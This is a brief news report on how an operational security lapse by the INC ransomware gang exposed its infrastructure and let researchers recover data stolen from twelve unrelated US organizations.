Security Failure Exposes Ransomware Gang's Operations
A recent investigation uncovered a significant operational security failure by the INC ransomware gang, allowing researchers to recover stolen data from a dozen US organizations.
What Went Wrong for the Ransomware Gang?
The gang's mistake led to the exposure of their tooling and infrastructure, which stored data exfiltrated from multiple victims. This included a RainINC ransomware variant that was executed from the PerfLogs directory.
Investigation and Findings
The investigation began after a US organization detected ransomware encryption activity on a production SQL Server. The researchers found restic-related remnants indicating the threat actor's use of the backup tool as part of their operational toolkit.
Impact and Implications
The discovery of encrypted data stolen from 12 unrelated organizations in the US has significant implications. The incidents were unrelated, distinct ransomware events, and none of the organizations were clients of the investigating firm.